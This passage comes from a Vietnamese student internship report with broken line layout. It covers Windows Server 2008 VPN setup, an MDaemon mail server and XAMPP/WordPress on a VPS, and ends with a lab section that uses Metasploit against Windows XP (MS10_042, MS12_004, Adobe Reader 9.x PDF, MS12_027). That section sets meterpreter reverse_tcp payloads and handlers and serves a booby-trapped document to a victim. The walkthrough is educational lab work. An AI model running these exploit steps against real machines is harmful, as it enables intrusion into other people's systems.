SVTT: Nguyễn Đình Duy
89. Đánh dấu
vào 2 mục
VPN access
và mục Lan
routing.
Click
Next>
Click
Finish để
tiến hành
kích hoạt.
83
SVTT: Nguyễn Đình Duy
90. Click Yes
để bắt đầu.
Routing
and Remote
Acces đã
sẵn sàng.
Để
cấu
hình dãi địa
chỉ IP khi
các
máy
Client truy
cập
vào
VPN
sẽ
được cấp ta
right click
vào Server
và
chọn
Properties.
84
SVTT: Nguyễn Đình Duy
92. Như
vậy
chúng ta đã
hoàn
tất
cấu
hình
cho phép
có thể truy
cập VPN
vào
máy
chủ. Tiếp
theo ta cần
tào
tài
khoảng để
có thể đăng
nhập vào
máy chủ.
Bằng cách
Right click
vào
My
conputer và
chọn
Manage.
Tiếp theo ta
vào System
tools
Local Users
and Groups
Users
86
SVTT: Nguyễn Đình Duy
93. Right Click
vào User và
chọn New
User…
Tạo 1 user
và điền tên
user
vào
mục User
name
và
mật khẩu
vào
ô
Password
và nhập lại
mật khẩu
vào
ô
Confim
password.
Click
Create để
tạo user.
87
SVTT: Nguyễn Đình Duy
94. Tượng tự
tạo 1 user
khác có tên
là client 2
Để User có
quyền truy
cập VPN ta
right click
vào
tài
khoảng cần
cấp quyền
và
chọn
Properties
88
SVTT: Nguyễn Đình Duy
95. Sang
tab
Dial-in và
chọn Allow
Access để
cấp quyền
và
click
OK
để
hoàn
tất.
Tương tự
cho user có
tên
là
Client2.
Chuẩn bị 2
máy
ảo.
Trên máy
ảo thứ 1 ta
vào Start
Settings
Network
Connection
s.
89
SVTT: Nguyễn Đình Duy
97. Chọn mục
Connect to
the
Network at
my
workplace
và
click
Next>
Click chọn
Virual
Private
Network
connection
và
chọn
Next>
91
SVTT: Nguyễn Đình Duy
98. Nhập tên
công ty vào
ô company
name
và
click Next>
Click Do
not dial the
intial
connection
và
click
Next>
92
SVTT: Nguyễn Đình Duy
99. Nhập địa
chỉ IP của
máy
chủ
hoặc
tên
domain đã
đăng ký và
click Next>
Chọn
Anyone’s
use và click
Next>
93
SVTT: Nguyễn Đình Duy
100. Chọn add a
shortcut to
this
connection
to
my
desktop để
thuận tiện
cho lần kết
nối sau và
click Finish
để hoàn tất.
Màn hình
đăng nhập
hiện lên ta
nhập
tên
User
và
Password
cần kết nối
và
click
Connect.
94
SVTT: Nguyễn Đình Duy
101. Sau khi kết
nối thành
công
thì
bên
góc
phải màn
hình sẽ có
kết
nối
mạng thứ 2.
Double
click vào
biểu tượng
mạng kết
nối
chuyển
sang
tab
Details để
xem
chi
tiết.
95
SVTT: Nguyễn Đình Duy
102. Các bước
thực hiện
tương
tự
cho Client
2. Và kết
quả
cho
Client
2
như sau.
Trên
Client1 tiến
hành ping
đến địa chỉ
Clien2.
96
SVTT: Nguyễn Đình Duy
104. Trên Client
2 vào Start
run
gõ //địa chỉ
client
2
(10.0.0.101
) và click
OK.
Đã
thấy
được thư
mục
mà
Client 1 đã
share.
Như vậy chúng ta đã hoản thành việc cài đặt và cấu hình VPN client to site.
2.3.2 Làm việc với Winsdows Server 2008 trên máy chủ ảo VPS (Virtual private
server)
VPS theo lưu lượng là loại hình máy chủ VPS tiện dụng, phù hợp & đem lại
nhiều lợi ích, hiệu quả cho các khách hàng mong muốn có một máy chủ riêng
với chi phí CỰC THẤP.
VPS là dịch vụ máy chủ chạy dưới dạng chia sẻ từ 1 tài nguyên server chính
hoạt động như một Dedicated Server. Người quản trị (khách hàng) có quyền
cao nhất để toàn quyền quản trị Server.
VPS kết nối Internet với 01 IP tĩnh và được cài đặt sẵn hệ điều hành tùy chọn.
VPS quản trị từ xa và cài đặt các phần mềm theo nhu cầu mà không bị giới
hạn số lượng domain.
VPS thích hợp cho việc xây dựng hệ thống Mail Server, Web Server,
Backup/Storage Server... dùng riêng hoặc truyền tải file dữ liệu giữa các chi
nhánh với nhau một cách dễ dàng, nhanh chóng thuận tiện và bảo mật.
VPS dễ dàng nâng cấp tài nguyên mà không cần trang bị phần cứng máy chủ
giảm tối đa chi phí.
VPS dễ dàng tái tạo lại hệ điều hành khi gặp sự cố hệ thống với thời gian thực
hiện rất nhanh mà hoàn toàn không cần cài đặt lại từ đầu.
98
SVTT: Nguyễn Đình Duy
105. VPS như một giải pháp dung hòa giữa Web Hosting và Dedicated Server theo
cả nghĩa chi phí và cách thức vận hành, vì vậy đây là giải pháp phù hợp cho
các cá nhân hoặc doanh nghiệp nhỏ muốn có một hệ thống máy chủ riêng biệt,
toàn quyền quản lý với Chi Phí Thấp.
Hình 2.3.2.1 Giao diện Remote Desktop Connection
Thông qua chương trình Remote Desktop Connection ta truy cập vào VPS đã
được thuê để tiến hành cấu hình, triển khai các dịch vụ như trên máy thật.
Hình 2.3.2.2 Giao diện ban đầu khi đăng nhập vào máy chủ VPS
Chúng ta tiến hành nhập User name và Password đã được cung cấp từ bên cho
thuê để truy cập vào.
99
SVTT: Nguyễn Đình Duy
106. Hình 2.3.2.3 Giao diện khi đã đăng nhập vào máy chủ VPS
2.3.2.1 Mail Server trên máy chủ ảo VPS.
Đăng nhập
máy
ảo
chủ
VPS
bằng công
cụ Remote
Desktop.
100
SVTT: Nguyễn Đình Duy
107. Đăng nhập
vào
máy
chủ ảo.
Dowload
bộ cài đặt
Mdeamon
và
chạy
file
Setup.exe
Trước tiên, bạn
tải phiên bản
MDaemon Mail
Server mới nhất
và bắt đầu quá
trình
cài
đặt.Bấm "Next"
để tiếp tục.
101
SVTT: Nguyễn Đình Duy
108. Đánh dấu vào ô
"I have read and
I agree with all
the terms of this
license
agreement"
Chọn đường dẫn
lưu
trữ
của
chương
trình,
mặc định sẽ là ổ
C hệ thống (ổ đĩa
có cài hệ điều
hành Microsoft
Windows).
Lựa chọn phiên
bản cài đặt, nếu
bạn có key đăng
ký thì nhập vào ô
phía dưới. Ở ví
dụ sử dụng là
phiên bản free
hoặc miễn phí 30
ngày của phiên
bản Pro.
102
SVTT: Nguyễn Đình Duy
109. Tùy chọn các
thông tim phù
hợp với vị trí, ở
đây là VietNam
Điền đúng thông
tin về quy mô của
tổ chức hoặc
công ty.
Sau khi hoàn tất
các bước trên,
chọn "Next" để
bắt đầu cài đặt.
103
SVTT: Nguyễn Đình Duy
110. Chờ đợi cho quá
trình cài đặt hoàn
tất.
Điền tên Domain
chính xác ví
dụ:nguyendinhdu
y.tk
Điền địa chỉ DNS
chính (Primary)
và dự phòng
(Backup)
104
SVTT: Nguyễn Đình Duy
111. Giữ nguyên lựa
chọn "Setup
MDaemon as a
system service"
Bấm "Finish" để
kết thúc quá trình
cài đặt và cấu
hình ban đầu, bắt
đầu sử dụng
105
SVTT: Nguyễn Đình Duy
112. Giao diện sau khi
cài đặt thành
công.
Tạo 1 tài khoảng
mới vào Account
New
Account…
106
SVTT: Nguyễn Đình Duy
113. Nhập thông tin
vào
Email
address và Email
Password. Click
OK để tạo tài
khoảng Email.
Vào
Mail.
OutLook
107
SVTT: Nguyễn Đình Duy
114. Cấu hình Out
Look mail để
quán lý mail cho
tài
khoảng
test@nguyendinh
duy.tk. Nhập tên
hiện
thị
vào
Display name và
click Next>
Nhập địa chỉ
Email và Click
Next>
108
SVTT: Nguyễn Đình Duy
115. Nhập địa chỉ IP
vào 2 ô Incoming
và Outgoing và
click Next.
Nhập tên tài
khoảng và mật
khẩu. Click Next.
109
SVTT: Nguyễn Đình Duy
116. Click Finish để
hoàn tất cấu hình
quản lý mail cho
tài khoảng test.
Tạo mail để kiểm
ra việc gửi mail
từ tài khoảng test
đến 1 e mail bất
kỳ.
110
SVTT: Nguyễn Đình Duy
117. Vào mail được
gửi và kiểm tra
Mail.
Xem mail tu tài
khoảng
test@nguyendinh
duy.tk
Trả lời lại Mail
của tài khoảng
test@nguyendinh
duy.tk
111
SVTT: Nguyễn Đình Duy
118. Vào lại mail của
tài
khoảng
test@nguyendinh
duy.tk và đã nhận
được hồi âm.
Như vậy chúng ta đã hoàn thành việc cài đặt và quản lý 1 mail Server trên
phần mềm Mdeamon.
2.3.2.2 Kết Nối VPN thông qua máy chủ ảo VPS.
Việc triển khai một mạng riêng ảo có nhiều dịch vụ và chức năng cần
phải làm việc cùng nhau một cách trôi chảy và dễ dàng, vì vậy những
người dùng truy cập từ xa có thể được định danh và xác thực; các được
hầm có thể được tạo lập, duy trì và quản lý cho hàng trăm người dùng;
việc định tuyến có thể kiểm soát tất cả luồng lưu lượng qua Gateway,
và trong khi tất các những thứ này đang tiếp tục, hiệu suất và sự an toàn
cần được duy trì.
Các thành phầm phải được cài đặt để tạo ra một hệ thống mạng riêng
ảo hoạt động đúng đắn. Để đưa ra quyết định đúng lúc triển khai các
kết nối mạng riêng ảo truy cập từ xa, ta phải hiểu tất cả các thành phần
liên quan. Trong chương "Tổng quan về mạng riêng ảo" chúng ta đã
thảo luận về kiểu kịch bản mạng riêng ảo truy cập từ xa, trong đó nhiều
Client truy cập tới một cổng kết nối đơn vào các tài nguyên trong mạng
112
SVTT: Nguyễn Đình Duy
119. Intranet. Trong phần này ta sẽ mô tả các thành phần của các kết nối
mạng riêng ảo truy cập từ xa và các quan điểm thiết kế gắn với chúng.
Mô hình VPN Client to Site:
Hình 2.3.1.1.7.1 Mô hình VPN Client to Site.
Để cấu hình và thiết lập kết nối VPN Client to Site trải qua các bước sau:
Đăng nhập
vào
máy
chủ ảo VPS
với quyền
quản trị.
113
SVTT: Nguyễn Đình Duy
123. Click
Finish để
tiến hành
kích hoạt.
Click Yes
để bắt đầu.
Routing
and Remote
Acces đã
sẵn sàng.
117
SVTT: Nguyễn Đình Duy
124. Để
cấu
hình dãi địa
chỉ IP khi
các
máy
Client truy
cập
vào
VPN
sẽ
được cấp ta
right click
vào Server
và
chọn
Properties.
Chuyễn
sang tab IP
và
chọn
Static
andress
pool.
118
SVTT: Nguyễn Đình Duy
125. Nhập dãy
địa chỉ bắt
đầu
vào
Start
IP
address và
dãy địa chỉ
kết
thúc
vvào End
IP address
và
Click
OK để chấp
nhận.
Như
vậy
chúng ta đã
hoàn
tất
cấu
hình
cho phép
có thể truy
cập VPN
vào
máy
chủ. Tiếp
theo ta cần
tào
tài
khoảng để
có thể đăng
nhập vào
máy chủ.
Bằng cách
Right click
vào
My
conputer và
chọn
Manage.
119
SVTT: Nguyễn Đình Duy
126. Tiếp theo ta
vào System
tools
Local Users
and Groups
Users
Right Click
vào User và
chọn New
User…
120
SVTT: Nguyễn Đình Duy
127. Tạo 1 user
và điền tên
user
vào
mục User
name
và
mật khẩu
vào
ô
Password
và nhập lại
mật khẩu
vào
ô
Confim
password.
Click
Create để
tạo user.
Tượng tự
tạo 1 user
khác có tên
là client 2
121
SVTT: Nguyễn Đình Duy
128. Để User có
quyền truy
cập VPN ta
right click
vào
tài
khoảng cần
cấp quyền
và
chọn
Properties
Sang
tab
Dial-in và
chọn Allow
Access để
cấp quyền
và
click
OK
để
hoàn
tất.
Tương tự
cho user có
tên
là
Client2.
122
SVTT: Nguyễn Đình Duy
129. Chuẩn bị 2
máy
ảo.
Trên máy
ảo thứ 1 ta
vào Start
Settings
Network
Connection
s.
Click vào
Create
a
new
Connection
.
123
SVTT: Nguyễn Đình Duy
132. Click Do
not dial the
intial
connection
và
click
Next>
Nhập địa
chỉ IP của
máy
chủ
hoặc
tên
domain đã
đăng ký và
click Next>
126
SVTT: Nguyễn Đình Duy
133. Chọn
Anyone’s
use và click
Next>
Chọn add a
shortcut to
this
connection
to
my
desktop để
thuận tiện
cho lần kết
nối sau và
click Finish
để hoàn tất.
127
SVTT: Nguyễn Đình Duy
134. Màn hình
đăng nhập
hiện lên ta
nhập
tên
User
và
Password
cần kết nối
và
click
Connect.
Sau khi kết
nối thành
công
thì
bên
góc
phải màn
hình sẽ có
kết
nối
mạng thứ 2.
128
SVTT: Nguyễn Đình Duy
135. Double
click vào
biểu tượng
mạng kết
nối
chuyển
sang
tab
Details để
xem
chi
tiết.
Các bước
thực hiện
tương
tự
cho Client
2. Và kết
quả
cho
Client
2
như sau.
129
SVTT: Nguyễn Đình Duy
137. Trên Clien1
tiến hành
share
1
folder cho
Clien
2.
Bằng cách
tạo 1 folder
right
click chọn
properties
tab
sharing
chọn Share
this folder
click
OK.
Trên Client
2 vào Start
run
gõ //địa chỉ
client
2
(10.0.0.101
) và click
OK.
131
SVTT: Nguyễn Đình Duy
138. Đã
thấy
được thư
mục
mà
Client 1 đã
share.
Như vậy chúng ta đã hoản thành việc cài đặt và cấu hình VPN client to site.
2.3.2.3 Cài đặt và cấu hình Web Server trên VPS.
XAMPP là một bộ công cụ lập trình PHP có thể cài đặt được trên nhiều
nền tảng khác nhau. Chữ X đầu tiên trong cụm từ XAMPP ám chỉ
cross-platform nghĩa là XAMPP có thể chạy trên Windows, Linux,
Mac OS, Solaris, còn các ký tự còn lại mang các ý nghĩa sau:
A = Apache, XAMPP bao gồm 1 Apache HTTP Server giúp chạy các ứng
dụng web.
M = MySQL, hệ quản trị cơ sở dữ liệu My SQL cũng được bao gồm trong
XAMPP.
P = PHP – ngôn ngữ lập trình PHP.
P = Perl – ngôn ngữ lập trình Perl.
Sau đây chúng ta cùng cài đặt và cấu hình Web Server bằng Xampp 1.7.3
Chúng ta
dowload và tiến
hành cài đặt bằng
file
Bạn chọn ngôn
ngữ cài đặt là
English và nhấn
OK để tiếp tục.
132
SVTT: Nguyễn Đình Duy
139. Bạn nhấn Next ở
màn hình tiếp
theo.
Theo mặc định
XAMPP sẽ được
cài đặt vào ổ C
theo đường dẫn
C:xampp, bạn có
thể nhấn Browse
và chọn đường
dẫn cài đặt khác
133
SVTT: Nguyễn Đình Duy
140. Bạn nhận chọn
các service kèm
theo XAMPP
trong mục
SERVICE
SECTION sau đó
nhấn Install để
tiếp tục.
Màn hình hiển thị
tiến độ cài đặt
XAMPP hiện ra.
134
SVTT: Nguyễn Đình Duy
141. Quá trình cài đặt
XAMPP hoàn tất,
bạn nhấn vào nút
Finish kết thúc.
XAMPP sẽ tự
động cài đặt các
service mà bạn đã
chọn ở mục
SERVICE
SECTION bên
trên, đầu tiên là
Apache service.
Tiếp đó là
MySQL service
Quá trình cài đặt
các service hoàn
tất, bạn nhấn OK
để tiếp tục.
135
SVTT: Nguyễn Đình Duy
142. Bạn nhấn OK ở
màn hình tiếp
theo để bật
XAMPP Control
Panel.
Sau khi cài đặt
xong các bạn
click Start ở mục
Apache và MySql
trong XAMOO
Control Panel
Application.
Vào trình duyệt
web và gõ vào
localhost. Và
chọn ngôn ngữ là
English.
136
SVTT: Nguyễn Đình Duy
143. Sau khi chọn
ngôn ngữ chúng
ta và click pHp
my admin.
Bạn nhập tên cơ
sở dữ liệu vào ô
create new
database và click
Create để tạo
database.
137
SVTT: Nguyễn Đình Duy
144. Và Databae đã
được tạo.
Tiếp theo các bạn
vào đường dẫn
cài đặt
xampphtdocs và
copy mã nguồn
wordpress mà
chúng ta đã
dowload trên
internet.
Vào thư mục
wordpress mà
chúng ta vừa mới
copy xong và tìm
file wp-configsample.php và
mở nó lên bằng
word pad.
Tìm và sửa thông
tin lại như hình.
138
SVTT: Nguyễn Đình Duy
145. Đổi tên file vừa
sửa chửa thành
wp-config.php
Vào đường dần
localhost/wordpre
ss/wpadmin/install.php.
Sau đó điền các
thông tin cần
thiết.
139
SVTT: Nguyễn Đình Duy
146. Sau đó click Cài
đặt WordPess.
Cấu hình
Wordpress thành
công. Ta Clich
Đăng Nhập.
140
SVTT: Nguyễn Đình Duy
147. Bạn điền thông
tin vừa thiết lập
vừa rồi và click
Đăng Nhập.
Màn hình sau khi
đăng nhập thành
công.
141
SVTT: Nguyễn Đình Duy
148. Ta vào Cài đặt
Tổng Quan
điền địa chỉ
chúng ta muốn
truy cập khi
chúng ta lướt web
vào 2 ô
Wordpress
address và Site
Address.
Và đây là trang
chủ của trang
Web chúng ta khi
vừa tạo xong.
142
SVTT: Nguyễn Đình Duy
149. Và sau khi đã
trang trí cho trang
web của chúng ta.
Như vậy chúng ta đã hoàn thành việc tạo 1 trang web cho riêng mình.
2.3.3 Bảo mật Windows
2.3.3.1 Khai thác lỗ hổng trên Windows XP với mã lỗi MS10_042
Chuẩn
bị
2
máy
ảo:
Windows
XP
(nạn nhân) và
máy
Back
Track 5r3 (máy
tấn công nạn
nhân)
Trên máy Back
Track cấu hình
địa chỉ IP trong
bài lab này cho
máy
là:
192.168.1.5
143
SVTT: Nguyễn Đình Duy
150. Trên máy Back
track
vào
chương
trình
terminal và gõ
lệnh
msfconsole
Tìm
mã
lỗi
bằng công cụ
metaploit bằng
cách gõ lệnh
search
ms10_042
Sau khi seach
được mã lỗi ta
dùng lệnh use
và copy mã lỗi
đã tìm được.
144
SVTT: Nguyễn Đình Duy
151. Dùng
lệnh
show
options
để biết thêm
các câu lệnh
cần thiết.
Dùng
lệnh
SRVHOST
<địa chỉ ip
máy
backtrack>
Dùng lệnh set
PAYLOAD
windows/meter
preter/preverse
_tcp
Dùng lệnh set
LHOST
<ip
backtrack>
145
SVTT: Nguyễn Đình Duy
152. Dùng
lệnh
exploit để tiến
hành khai thác
lỗi.
Chú
ý
đường
dẫn
http://192.168.
nếu
1.5:80/
máy nạn nhân
vào đường dẫn
này sẽ bị hack.
Trở
lại
máy
Windows XP.
Kiểm tra địa
chỉ IP máy XP.
Với địa chỉ ip
máy
XP
là
192.168.1.6
Trên máy XP
ta
vào
trình
duyệt web và
gõ đường dẫn
http://192.168.
1.5:80/
146
SVTT: Nguyễn Đình Duy
153. Trên máy XP
tự động xuất
hiện hộp thoại
Help
and
Support.
Trên máy Back
Track bắt đầu
nhận thấy có
sự kết nối đến
địa
chỉ
http://192.168.
1.5:80/
Và nhận thấy
có
địa
chỉ
192.168.1.6 kết
nối vào. Và tạo
phiên kết nối
vào nó.
147
SVTT: Nguyễn Đình Duy
154. Trên máy back
track ta gõ lệnh
sessions
để
kiểm tra.
Dùng
lệnh
sessions –i 1
Dùng
lệnh
sysinfo để xem
thông tin máy
nạn nhân. Và
như vậy ta đã
khai thác thành
công lỗ hổng
MS10_042
trên máy XP.
2.3.3.2 Khai thác lỗ hổng bảo mật Win XP mã lỗi MS12_004
Chuẩn bị 2
máy
ảo:
Windows
XP
nhân)
(nạn
và
máy Back
Track 5r3
(máy
tấn
công
nạn
nhân)
148
SVTT: Nguyễn Đình Duy
156. Tìm mã lỗi
bằng công
cụ
metaploit
bằng cách
gõ
lệnh
search
ms12_004
Sau
khi
seach được
mã lỗi ta
dùng lệnh
use
và
copy
mã
lỗi đã tìm
được.
150
SVTT: Nguyễn Đình Duy
158. backtrack>
Dùng lệnh
exploit để
tiến
hành
khai
thác
lỗi. Chú ý
đường dẫn
http://192.
168.1.5:80
80/
nếu
máy
nạn
nhân
vào
đường dẫn
này sẽ bị
hack.
Trở
lại
máy
Windows
XP. Kiểm
tra địa chỉ
IP
máy
XP.
Với
địa chỉ ip
máy XP là
192.168.1.
6
152
SVTT: Nguyễn Đình Duy
159. Trên
máy
XP ta vào
trình duyệt
web và gõ
đường dẫn
http://192.
168.1.5:80/
Trên
máy
XP tự động
xuất
hiện
hộp
thoại
yêu
cầu
chạy
Windows
Media
Player.
Nếu
chọn
Run sẽ bị
hack.
Trên
máy
Back
Track
đầu
bắt
nhận
thấy có sự
kết nối đến
địa
chỉ
http://192.
168.1.5:80
80/
153
SVTT: Nguyễn Đình Duy
160. Và
nhận
thấy có địa
chỉ
192.168.1.
6 kết nối
vào. Và tạo
phiên
kết
nối vào nó.
Dùng lệnh
sessions –i
1
Dùng lệnh
sysinfo để
xem thông
tin
máy
nạn nhân.
Và
như
vậy ta đã
khai
thác
thành công
lỗ
hổng
MS12_004
trên
máy
XP.
154
SVTT: Nguyễn Đình Duy
161. 2.3.3.3 Khai thác lỗ hổng trên Win XP với lỗi Adobe Reader 9.X
Chuẩn
bị
2
máy
ảo:
Windows
XP
(nạn nhân) và
máy
Back
Track 5r3 (máy
tấn công nạn
nhân)
Trên máy Back
Track cấu hình
địa chỉ IP trong
bài lab này cho
máy
là:
192.168.1.5
Trên máy Back
track
chương
vào
trình
terminal và gõ
lệnh
msfconsole
155
SVTT: Nguyễn Đình Duy
162. Tìm
mã
lỗi
bằng công cụ
metaploit bằng
cách gõ lệnh
user
exploit/windo
ws/fileformat/a
dobe_pdf_emb
edded_exe
Dùng
lệnh
show
options
để biết thêm
các câu lệnh
cần thiết.
Dùng
lệnh
FILENAMET
ênFile
Dùng lệnh set
INFILENAME
Đường_Dẫn_
file_pdf_bất_k
ỳ.
Dùng lệnh set
PAYLOAD
windows/meter
156
SVTT: Nguyễn Đình Duy
163. preter/reverse_
tcp để sử dụng
mã độc.
Dùng lệnh set
LHOSTip_ba
cktrack.
Dùng
lệnh
setLPORTp
ort_tùy_ý_muố
n_mở
Dùng
lệnh
exploit để tiến
hành khai thác
lỗi. .
Copy file đã
tiêm mã độc ra
Desktop.
Copy file có
mã
độc
vào
máy Windows
XP bằng lệnh
copy và past
vào máy XP.
157
SVTT: Nguyễn Đình Duy
164. Trên
máy
BackTrack
sẽ
lắn nghe kết
nối bằng cách
sử dụng lệnh
user
exploit/multi/h
ander.
Sau
đó
set
LHOTip_bac
ktrack
Set
LPORT
như_khai_bá
o_port_trên.
Sau đó dùng
lệnh exploit để
lắng nghe.
Trên máy XP
tiến hành đọc
file có mã độc
và xuất hiện
hộp thoại. Nếu
Click Open sẽ
bị hack.
Trên máy Back
track gõ lệnh
getuid để xem
158
SVTT: Nguyễn Đình Duy
165. tên máy.
Gõ
lệnh
sysinfo để xem
thông tin máy
nạn nhân. Như
vậy chúng ta
đã hoàn thành
khai thác lỗi
trên
Adobe
Reader 9.X
2.3.3.4 Khai thác lỗ hổng trên Win XP với mã lỗi MS12_027
Chuẩn
bị
2
máy
ảo:
Windows
XP
(nạn nhân) và
máy
Back
Track 5r3 (máy
tấn công nạn
nhân)
Trên máy Back
Track cấu hình
địa chỉ IP trong
bài lab này cho
máy
là:
192.168.1.5
159
SVTT: Nguyễn Đình Duy
166. Trên máy Back
track
vào
chương
trình
terminal và gõ
lệnh
msfconsole
Tìm
mã
lỗi
bằng công cụ
metaploit bằng
cách gõ lệnh
search
ms12_027
Sau khi seach
được mã lỗi ta
dùng lệnh use
và copy mã lỗi
đã tìm được.
160
SVTT: Nguyễn Đình Duy
167. Dùng
lệnh
show
options
để biết thêm
các câu lệnh
cần thiết.
Dùng
lệnh
setFILENAM
Etên_file.
Dùng lệnh set
PAYLOAD
windows/meter
preter/preverse
_tcp
Dùng lệnh set
LHOST <địa
chỉ
ip
máy
backtrack>
Dùng
lệnh
exploit để khai
thác lỗi.
161
SVTT: Nguyễn Đình Duy
168. Copy file đã
tiêm mã độc ra
ngoài
màng
hình
destop
bằng
lệnh
cpđường_dẫn
file
nguồnđường
dẫn_fil_ đích
Dùng
lệnh
use/exploit/mul
ti/handler
Dùng lệnh set
PAYLOAD
windows/meter
preter/reverse_
tcp
Dùng lệnh set
LHOST
<ip
backtrack>
Dùng lệnh set
LHOSTip_ba
ck_track
Dùng
lệnh
exploit để bắt
đầu lắng nghe.
162
SVTT: Nguyễn Đình Duy
169. Trên máy Back
track copy file
đã có mã độc ở
ngoài desktop
vào
var/www
để nạn nhân
dowload về.
Khởi
dịch
động
vụ
aphache
trên
Backtrack
bằng
lệnh
/etc/init.d/apac
he2 start
Trên máy XP
ta
vào
trình
duyệt web để
dowload file ta
đã up trên máy
back
track
bằng cách gõ:
192.168.1.5/du
y11145941.doc
163
SVTT: Nguyễn Đình Duy
170. Xuất hiện hộp
thoại và nhấn
Save
để
dowload
Khi máy XP
mở file word
có nhiễm mã
độc thì sẽ bị
hack.
Bênh
máy
Back track đã
nhận thấy 1 kết
nối
và
tạo
phiên kết nối
với nạn nhân.
Dùng
lệnh
sysinfo
để
kiểm tra. Như
vậy ta đã hoàn
thành khai thác
lỗi MS12_027
trên win XP.
164
SVTT: Nguyễn Đình Duy
171. 2.4 Các kết quả đạt được
Sau khi tìm hiểu và triển khai các dịch vụ trên máy ảo VMWare và VPS em đã
có kiến thức về:
- Nguyên lý cơ bản của hệ điều hành mạ
ứ
ạng, có kỹ
năng cần thiết để cài đặ
ỉnh mạng doanh nghiệp cỡ vừa và
lớn dựa vào Windows Server 2008.
- Hiểu về cấu trúc hạ tầng, thiết kế và quản trị hệ thống mạ
ụ quả
ợ
.
- Triển khai, thiết kế, quản lý và chuẩn đoán hỏng hóc cho một hệ thống mạng.
- Có các kiến thức trên nền tảng công nghệ Windows Server 2008.
2.4.1 Kinh nghiệm thực tế
Có cái nhìn thực tế về việc cấu hình, quản lý một hệ thống mạng của
một doanh nghiệp thông qua nền tảng.
Được trực tiếp tiếp xúc những công nghệ và thiết bị mà trước đây chỉ
biết đến thông qua sách vở.
Được vận dụng những kiến thức tiếp thu trên lớp vào công việc thực tế.
Bổ sung và trau dồi những thiếu sót về kiến thức trong quá trình học
trên lớp.
Trực tiếp triển khai và cấu hình trên máy chủ ảo VPS.
Có kinh nghiệm trong việc khắc phục sự cố khi hệ thống gặp lỗi.
2.4.2 Hoàn thiện bản thân
Các thành viên trong nhóm đã định hướng rõ ràng mục tiêu sắp tới sẽ
làm.
Tự tin hơn trong việc giao tiếp với mọi người trong công việc.
Nâng cao khả năng làm việc nhóm cũng như khả năng tự bản thân giải
quyết vấn đề khó khăn gặp phải trong công việc.
2.4.3 Các kiến thức được lĩnh hội
Kiến thức thực tế về hệ thống mạng của doanh nghiệp.
Hiểu các thành phần công nghệ mạng doanh nghiệp vừa và nhỏ.
165
SVTT: Nguyễn Đình Duy